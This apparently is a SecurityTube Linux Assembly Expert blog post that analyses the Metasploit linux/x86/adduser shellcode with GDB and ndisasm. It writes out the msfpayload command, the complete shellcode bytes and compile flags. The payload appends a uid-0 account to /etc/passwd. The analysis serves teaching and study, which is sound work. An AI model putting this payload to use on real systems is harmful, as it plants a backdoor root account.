Source: SecurityTube
I explain every line which needs explanation; I hope it is explained well enough. If you don't understand something, leave me a comment and I will explain/respond to all questions.
1) We need to generate our payload for later analysis
msfpayload linux/x86/adduser USER=doomedraven PASS=rulez C
/*
 * linux/x86/adduser - 98 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependSetresgid=false, PrependSetregid=false,
 * PrependSetgid=false, PrependChrootBreak=false,
 * AppendExit=false, USER=doomedraven, PASS=rulez,
 * SHELL=/bin/sh
 */
unsigned char payload[] =\
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51"
"\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63"
"\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x29\x00\x00\x00\x64\x6f"
"\x6f\x6d\x65\x64\x72\x61\x76\x65\x6e\x3a\x41\x7a\x56\x73\x58"
"\x48\x68\x50\x44\x73\x74\x56\x51\x3a\x30\x3a\x30\x3a\x3a\x2f"
"\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04"
"\x58\xcd\x80\x6a\x01\x58\xcd\x80";
Compilation: gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode
The source of the .c wrapper can be found here.
2) Analyzing with GDB
gdb -q ./shellcode
(gdb) disassemble
Dump of assembler code for function payload:
=> 0x0804a040 <+0>:  xor    ecx,ecx              ; ecx = 0 (second argument)
   0x0804a042 <+2>:  mov    ebx,ecx              ; ebx = 0 (first argument)
   0x0804a044 <+4>:  push   0x46                 ; 70 = __NR_setreuid -> man 2 setreuid
   0x0804a046 <+6>:  pop    eax                  ; eax = 70
   0x0804a047 <+7>:  int    0x80                 ; setreuid(0, 0); returns -1 here = -EPERM, because the debugged process is not running as root
   0x0804a049 <+9>:  push   0x5                  ; 5
   0x0804a04b <+11>: pop    eax                  ; eax = 0x5 = __NR_open -> man 2 open
   0x0804a04c <+12>: xor    ecx,ecx              ; ecx = 0
   0x0804a04e <+14>: push   ecx                  ; 0 = NUL terminator for the path string
   0x0804a04f <+15>: push   0x64777373           ; "dwss"
   0x0804a054 <+20>: push   0x61702f2f           ; "ap//" <- two slashes because "//" is equivalent to "/" in a path and we need 4 bytes
   0x0804a059 <+25>: push   0x6374652f           ; "cte/" <- start of "/etc//passwd"
   0x0804a05e <+30>: mov    ebx,esp              ; save the pointer to "/etc//passwd" in ebx
   0x0804a060 <+32>: inc    ecx                  ; 1 == O_WRONLY <- /usr/include/asm-generic/fcntl.h
   0x0804a061 <+33>: mov    ch,0x4               ; ecx = 0x401 == 1025 == O_WRONLY | O_APPEND (O_APPEND = 02000 octal = 0x400) <- /usr/include/asm-generic/fcntl.h
   0x0804a063 <+35>: int    0x80                 ; open("/etc//passwd", O_WRONLY|O_APPEND); returns -13 here = -EACCES, again because the process is not root
   0x0804a065 <+37>: xchg   ebx,eax              ; save the syscall result (the file descriptor) in ebx
   0x0804a066 <+38>: call   0x804a094            ; pushes the address of the bytes that follow (0x0804a06b) and jumps over them
   ; The bytes from +43 to +83 are not instructions: they are the string "doomedraven:AzVsXHhPDstVQ:0:0::/:/bin/sh\n"
   ; (41 = 0x29 bytes, which is exactly the call's displacement 0x00000029 stored just before it).
   ; GDB decodes them as the nonsense below, and because the trailing 0x0a is swallowed together with the following
   ; bytes, the real instructions after the string are shown misaligned (see the ndisasm section below).
   0x0804a06b <+43>: outs   dx,DWORD PTR fs:[esi]
   0x0804a06d <+45>: outs   dx,DWORD PTR ds:[esi]
   0x0804a06e <+46>: ins    DWORD PTR es:[edi],dx
   0x0804a06f <+47>: gs
   0x0804a070 <+48>: fs
   0x0804a071 <+49>: jb     0x804a0d4
   0x0804a073 <+51>: jbe    0x804a0da
   0x0804a075 <+53>: outs   dx,BYTE PTR ds:[esi]
   0x0804a076 <+54>: cmp    al,BYTE PTR [ecx+0x7a]
   0x0804a079 <+57>: push   esi
   0x0804a07a <+58>: jae    0x804a0d4
   0x0804a07c <+60>: dec    eax
   0x0804a07d <+61>: push   0x74734450
   0x0804a082 <+66>: push   esi
   0x0804a083 <+67>: push   ecx
   0x0804a084 <+68>: cmp    dh,BYTE PTR [eax]
   0x0804a086 <+70>: cmp    dh,BYTE PTR [eax]
   0x0804a088 <+72>: cmp    bh,BYTE PTR [edx]
   0x0804a08a <+74>: das
   0x0804a08b <+75>: cmp    ch,BYTE PTR [edi]
   0x0804a08d <+77>: bound  ebp,QWORD PTR [ecx+0x6e]
   0x0804a090 <+80>: das
   0x0804a091 <+81>: jae    0x804a0fb
   0x0804a093 <+83>: or     bl,BYTE PTR [ecx-0x75] ; mis-decoded: 0x0a is the "\n" ending the string, 0x59 at +84 (the call target) is "pop ecx" = address of the string
   0x0804a096 <+86>: push   ecx                  ; mis-decoded: the real instruction at +85 is "mov edx,DWORD PTR [ecx-0x4]" (8b 51 fc) = edx = 0x29 = string length
   0x0804a097 <+87>: cld
   0x0804a098 <+88>: push   0x4
   0x0804a09a <+90>: pop    eax                  ; eax = 4 == __NR_write == write(int fd, const void *buf, size_t count)
   0x0804a09b <+91>: int    0x80                 ; write(ebx = fd, ecx = string, edx = 41)
   0x0804a09d <+93>: push   0x1
   0x0804a09f <+95>: pop    eax                  ; eax = 1 == __NR_exit
   0x0804a0a0 <+96>: int    0x80                 ; exit()
   0x0804a0a2 <+98>: add    BYTE PTR [eax],al    ; past the end of the 98-byte payload, not part of the shellcode
End of assembler dump.
3) Looking with Ndisasm
User: doomedraven   Password hash: import crypt; crypt.crypt('rules', 'Az') -> 'Azble21jpm/n6'
(this run uses pass=rules, so the hash differs from the "AzVsXHhPDstVQ" embedded in the PASS=rulez payload above; the salt "Az" is the same.)
msfpayload -p linux/x86/adduser user=doomedraven pass=rules R | ndisasm -
(ndisasm decodes in 16-bit mode by default, hence the [bx+si]-style operands; only the ASCII column on the right matters here.)
-> removed
00000029 0000      add [bx+si],al       ; 0 <- last two zero bytes of the call displacement (0x29 00 00 00) that precedes the string
0000002B 646F      fs outsw             ; "do" <- start of the username
0000002D 6F        outsw                ; "o"
0000002E 6D        insw                 ; "m"
0000002F 65647261  fs jc 0x94           ; "edra"
00000033 7665      jna 0x9a             ; "ve"
00000035 6E        outsb                ; "n"
00000036 3A417A    cmp al,[bx+di+0x7a]  ; ":Az" <- start of the password hash
00000039 626C65    bound bp,[si+0x65]   ; "ble"
0000003C 3231      xor dh,[bx+di]       ; "21"
0000003E 6A70      push byte +0x70      ; "jp"
00000040 6D        insw                 ; "m"
00000041 2F        das                  ; "/"
00000042 6E        outsb                ; "n"
00000043 363A30    cmp dh,[ss:bx+si]    ; "6:0" <- end of the hash, then the uid
00000046 3A30      cmp dh,[bx+si]       ; ":0" <- gid
00000048 3A3A      cmp bh,[bp+si]       ; "::" <- empty GECOS field
0000004A 2F        das                  ; "/" <- home directory
0000004B 3A2F      cmp ch,[bx]          ; ":/"
0000004D 62696E    bound bp,[bx+di+0x6e]; "bin" <- shell
00000050 2F        das                  ; "/"
00000051 7368      jnc 0xbb             ; "sh"
00000053 0A598B    or bl,[bx+di-0x75]   ; "\n" ends the string; the 0x59 (pop ecx) that follows is swallowed into this bogus instruction
-> removed
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: